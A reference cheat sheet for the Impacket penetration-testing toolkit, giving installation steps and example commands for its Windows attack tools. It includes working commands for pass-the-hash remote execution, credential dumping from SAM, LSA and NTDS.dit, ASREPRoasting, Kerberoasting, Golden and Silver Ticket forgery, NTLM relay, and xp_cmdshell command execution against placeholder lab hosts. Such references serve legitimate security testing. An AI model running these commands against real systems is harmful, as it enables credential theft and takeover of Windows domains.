Overview
Impacket is a collection of Python classes for working with network protocols. It provides low-level programmatic access to packets and implements several protocols including SMB, MSRPC, and Kerberos. Impacket includes numerous ready-to-use tools for penetration testing, particularly focused on Windows environments.
⚠️ Warning: Impacket is a security testing tool that should only be used in environments where you have explicit permission to do so.
Installation
From PyPI
pip install impacket
From GitHub
git clone https://github.com/fortra/impacket.git
cd impacket
pip install -r requirements.txt
python setup.py install
On Kali Linux
sudo apt update
sudo apt install -y python3-impacket
Using Virtual Environment
# Create and activate virtual environment
python -m venv impacket-env
source impacket-env/bin/activate # Linux/macOS
impacket-env\Scripts\activate.bat # Windows
# Install Impacket
pip install impacket
psexec.py
Executes commands on remote Windows systems using the SMB protocol, similar to SysInternals’ PsExec.
Basic Usage
psexec.py [domain/]username[:password]@target [options] [command]
Common Options
| Option | Description |
|---|
-hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) |
-k | Use Kerberos authentication |
-no-pass | Don’t ask for password (useful for Kerberos) |
-port [port] | Connect to SMB Server port (default: 445) |
-debug | Turn DEBUG output ON |
Examples
# Execute command with explicit credentials
psexec.py administrator:Password123@192.168.1.100 cmd.exe
# Execute command with domain credentials
psexec.py domain/administrator:Password123@192.168.1.100 cmd.exe
# Execute specific command
psexec.py administrator:Password123@192.168.1.100 "ipconfig /all"
# Use hash instead of password (Pass-the-Hash)
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 cmd.exe
smbexec.py
Similar to psexec.py but uses different techniques to execute commands, making it potentially stealthier.
Basic Usage
smbexec.py [domain/]username[:password]@target [options]
Common Options
| Option | Description |
|---|
-hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) |
-share SHARE | Share where the output will be grabbed from (default: ADMIN$) |
-shell-type \\{cmd,powershell\\} | Shell type to use (default: cmd) |
-codec CODEC | Sets encoding used (codec) from the target’s output (default: UTF-8) |
-service-name NAME | Service name to use (default: random) |
Examples
# Execute with explicit credentials
smbexec.py administrator:Password123@192.168.1.100
# Execute with domain credentials
smbexec.py domain/administrator:Password123@192.168.1.100
# Use hash instead of password (Pass-the-Hash)
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
# Use PowerShell instead of cmd
smbexec.py -shell-type powershell administrator:Password123@192.168.1.100
wmiexec.py
Executes commands on remote Windows systems using WMI.
Basic Usage
wmiexec.py [domain/]username[:password]@target [options] [command]
Common Options
| Option | Description |
|---|
-hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) |
-share SHARE | Share where the output will be grabbed from (default: ADMIN$) |
-silentcommand | Execute command and return immediately without output |
-codec CODEC | Sets encoding used (codec) from the target’s output (default: UTF-8) |
-shell-type \\{cmd,powershell\\} | Shell type to use (default: cmd) |
Examples
# Execute with explicit credentials
wmiexec.py administrator:Password123@192.168.1.100
# Execute with domain credentials
wmiexec.py domain/administrator:Password123@192.168.1.100
# Execute specific command
wmiexec.py administrator:Password123@192.168.1.100 "ipconfig /all"
# Use hash instead of password (Pass-the-Hash)
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
dcomexec.py
Executes commands on remote Windows systems using DCOM objects.
Basic Usage
dcomexec.py [domain/]username[:password]@target [options] [command]
Common Options
| Option | Description |
|---|
-hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) |
-object \\{ShellWindows,ShellBrowserWindow,MMC20\\} | DCOM object to use (default: MMC20.Application) |
-silentcommand | Execute command and return immediately without output |
-codec CODEC | Sets encoding used (codec) from the target’s output (default: UTF-8) |
-shell-type \\{cmd,powershell\\} | Shell type to use (default: cmd) |
Examples
# Execute with explicit credentials
dcomexec.py administrator:Password123@192.168.1.100
# Execute with domain credentials
dcomexec.py domain/administrator:Password123@192.168.1.100
# Execute with specific DCOM object
dcomexec.py -object ShellWindows administrator:Password123@192.168.1.100
# Use hash instead of password (Pass-the-Hash)
dcomexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
atexec.py
Executes commands on remote Windows systems using the Task Scheduler service.
Basic Usage
atexec.py [domain/]username[:password]@target [options] command
Common Options
| Option | Description |
|---|
-hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) |
-silentcommand | Execute command and return immediately without output |
-codec CODEC | Sets encoding used (codec) from the target’s output (default: UTF-8) |
Examples
# Execute command with explicit credentials
atexec.py administrator:Password123@192.168.1.100 "whoami > C:\\temp\\whoami.txt"
# Execute command with domain credentials
atexec.py domain/administrator:Password123@192.168.1.100 "whoami > C:\\temp\\whoami.txt"
# Use hash instead of password (Pass-the-Hash)
atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 "whoami > C:\\temp\\whoami.txt"
secretsdump.py
Extracts credentials from a remote Windows system, including SAM, LSA Secrets, and NTDS.dit.
Basic Usage
secretsdump.py [domain/]username[:password]@target [options]
Common Options
| Option | Description |
|---|
-hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) |
-just-dc | Extract only NTDS.DIT data (domain controller only) |
-just-dc-ntlm | Extract only NTDS.DIT NTLM hashes (domain controller only) |
-just-dc-user USER | Extract only NTDS.DIT data for specific user |
-pwd-last-set | Shows pwdLastSet attribute for each NTDS.DIT account |
-user-status | Shows whether the user is enabled or disabled |
-history | Dump password history |
-outputfile FILE | Write output to file |
Examples
# Dump credentials with explicit credentials
secretsdump.py administrator:Password123@192.168.1.100
# Dump credentials with domain credentials
secretsdump.py domain/administrator:Password123@192.168.1.100
# Dump credentials using hash (Pass-the-Hash)
secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
# Dump credentials from local files
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
# Dump credentials from NTDS.dit
secretsdump.py -ntds ntds.dit -system system.save LOCAL
# Extract only domain controller NTLM hashes
secretsdump.py -just-dc-ntlm domain/administrator:Password123@192.168.1.100
GetNPUsers.py
Retrieves password hashes for users with “Do not require Kerberos preauthentication” set (ASREPRoast attack).
Basic Usage
GetNPUsers.py [domain/]username[:password] -dc-ip <DC_IP> [options]
Common Options
| Option | Description |
|---|
-request | Requests TGT for users and output them in JtR/hashcat format |
-no-pass | Don’t ask for password (useful for Kerberos) |
-k | Use Kerberos authentication |
-dc-ip IP | IP Address of the domain controller |
-usersfile FILE | File with user per line to test |
-format \\{hashcat,john\\} | Format to save the AS_REP responses (default: hashcat) |
-outputfile FILE | Output filename to write ciphers in JtR/hashcat format |
Examples
# Get users without Kerberos preauthentication with explicit credentials
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100 -request
# Get users without Kerberos preauthentication for specific user
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100 -request -target-user user1
# Get users without Kerberos preauthentication for all users in domain
GetNPUsers.py domain/ -dc-ip 192.168.1.100 -usersfile users.txt -format hashcat
# Use no credentials (anonymous)
GetNPUsers.py domain/ -dc-ip 192.168.1.100 -no-pass
GetUserSPNs.py
Retrieves Service Principal Names (SPNs) for accounts in the domain (Kerberoasting attack).
Basic Usage
GetUserSPNs.py [domain/]username[:password] -dc-ip <DC_IP> [options]
Common Options
| Option | Description |
|---|
-request | Requests TGS for users and output them in JtR/hashcat format |
-hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) |
-dc-ip IP | IP Address of the domain controller |
-target-user USER | Target specific user to request TGS for |
-outputfile FILE | Output filename to write ciphers in JtR/hashcat format |
-format \\{hashcat,john\\} | Format to save the TGS tickets (default: hashcat) |
Examples
# Get SPNs with explicit credentials
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request
# Get SPNs for specific user
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request -target-user sqlservice
# Output hashes in specific format
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request -format hashcat
# Use hash instead of password (Pass-the-Hash)
GetUserSPNs.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 domain/username -dc-ip 192.168.1.100 -request
ticketer.py
Creates Golden and Silver Tickets for Kerberos authentication.
Basic Usage
ticketer.py [options] username
Common Options
| Option | Description |
|---|
-nthash HASH | NT hash for the user or service account |
-aesKey KEY | AES key for the user or service account |
-domain DOMAIN | Domain name |
-domain-sid SID | Domain SID |
-spn SPN | Service Principal Name (for Silver Tickets) |
-groups IDS | Comma-separated list of group IDs to include in the ticket |
-duration HOURS | Ticket duration in hours (default: 10) |
-out FILE | Output filename to save the ticket |
Examples
# Create Golden Ticket
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local administrator
# Create Silver Ticket
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local -spn MSSQLSvc/sqlserver.contoso.local:1433 administrator
# Specify output file
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local -out ticket.kirbi administrator
smbclient.py
Provides an SMB client to access shares and files on remote systems.
Basic Usage
smbclient.py [domain/]username[:password]@target [options]
Common Options
| Option | Description |
|---|
-hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) |
-port [port] | Connect to SMB Server port (default: 445) |
-file FILE | Input file with commands to execute in the mini shell |
-debug | Turn DEBUG output ON |
Common Commands (Interactive Shell)
| Command | Description |
|---|
help | Show available commands |
shares | List available shares |
use <share> | Connect to a specific share |
ls | List files in current directory |
cd <dir> | Change directory |
get <file> | Download file |
put <file> | Upload file |
rm <file> | Delete file |
mkdir <dir> | Create directory |
rmdir <dir> | Remove directory |
exit | Exit the shell |
Examples
# Connect with explicit credentials
smbclient.py administrator:Password123@192.168.1.100
# Connect with domain credentials
smbclient.py domain/administrator:Password123@192.168.1.100
# Use hash instead of password (Pass-the-Hash)
smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
mssqlclient.py
Provides a client to interact with Microsoft SQL Server instances.
Basic Usage
mssqlclient.py [domain/]username[:password]@target [options]
Common Options
| Option | Description |
|---|
-hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) |
-windows-auth | Use Windows Authentication (default: False) |
-port [port] | Destination port to connect to (default: 1433) |
-db DATABASE | MSSQL database instance (default: None) |
-file FILE | Input file with commands to execute in the SQL shell |
-debug | Turn DEBUG output ON |
Common Commands (Interactive Shell)
| Command | Description |
|---|
help | Show available commands |
enable_xp_cmdshell | Enable the xp_cmdshell stored procedure |
disable_xp_cmdshell | Disable the xp_cmdshell stored procedure |
xp_cmdshell <command> | Execute command through xp_cmdshell |
sp_start_job <job> | Start a SQL Server job |
exit | Exit the shell |
Examples
# Connect with explicit credentials
mssqlclient.py sa:Password123@192.168.1.100
# Connect with domain credentials
mssqlclient.py domain/sqluser:Password123@192.168.1.100
# Use hash instead of password (Pass-the-Hash)
mssqlclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 sa@192.168.1.100
# Enable Windows authentication
mssqlclient.py domain/sqluser:Password123@192.168.1.100 -windows-auth
ntlmrelayx.py
Performs NTLM Relay attacks.
Basic Usage
ntlmrelayx.py [options]
Common Options
| Option | Description |
|---|
-t TARGET | Target to relay the credentials to |
-tf FILE | File with targets to relay the credentials to |
-w | Start the HTTP server and do not relay credentials |
-e FILE | Execute this file when a connection is relayed |
-c COMMAND | Execute this command when a connection is relayed |
-smb2support | Enable SMB2 support |
-socks | Launch a SOCKS proxy for the connection |
-one-shot | Relay only one connection |
-debug | Turn DEBUG output ON |
Examples
# Relay to specific target
ntlmrelayx.py -t smb://192.168.1.100 -smb2support
# Relay to multiple targets
ntlmrelayx.py -tf targets.txt -smb2support
# Execute command on successful relay
ntlmrelayx.py -t smb://192.168.1.100 -smb2support -c "whoami > C:\\temp\\whoami.txt"
# Dump SAM database on successful relay
ntlmrelayx.py -t smb://192.168.1.100 -smb2support -d
# Start SOCKS proxy
ntlmrelayx.py -tf targets.txt -socks
lookupsid.py
Performs SID lookups to enumerate users and groups.
Basic Usage
lookupsid.py [domain/]username[:password]@target [options]
Common Options
| Option | Description |
|---|
-hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) |
-domain DOMAIN | Domain to enumerate (default: target domain) |
-debug | Turn DEBUG output ON |
Examples
# Enumerate SIDs with explicit credentials
lookupsid.py administrator:Password123@192.168.1.100
# Enumerate SIDs with domain credentials
lookupsid.py domain/administrator:Password123@192.168.1.100
# Use hash instead of password (Pass-the-Hash)
lookupsid.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
reg.py
Provides a remote registry manipulation tool.
Basic Usage
reg.py [domain/]username[:password]@target [options] action [params]
Common Options
| Option | Description |
|---|
-hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) |
-debug | Turn DEBUG output ON |
Actions
| Action | Description |
|---|
query | Query a registry key or value |
add | Add a registry key or value |
delete | Delete a registry key or value |
save | Save a registry hive to a file |
Examples
# Query registry key with explicit credentials
reg.py administrator:Password123@192.168.1.100 query -keyName HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion
# Add registry key with domain credentials
reg.py domain/administrator:Password123@192.168.1.100 add -keyName HKLM\\SOFTWARE\\Test -v TestValue -vt REG_SZ -vd "Test Data"
# Delete registry key with hash (Pass-the-Hash)
reg.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 delete -keyName HKLM\\SOFTWARE\\Test
| Parameter | Description |
|---|
-h, --help | Show help message and exit |
-debug | Turn DEBUG output ON |
-hashes LMHASH:NTHASH | NTLM hashes, format is LMHASH:NTHASH |
-no-pass | Don’t ask for password (useful for Kerberos) |
-k | Use Kerberos authentication |
-aesKey KEY | AES key to use for Kerberos authentication |
-dc-ip IP | IP Address of the domain controller |
-target-ip IP | IP Address of the target machine |
-port [port] | Destination port to connect to |
Resources
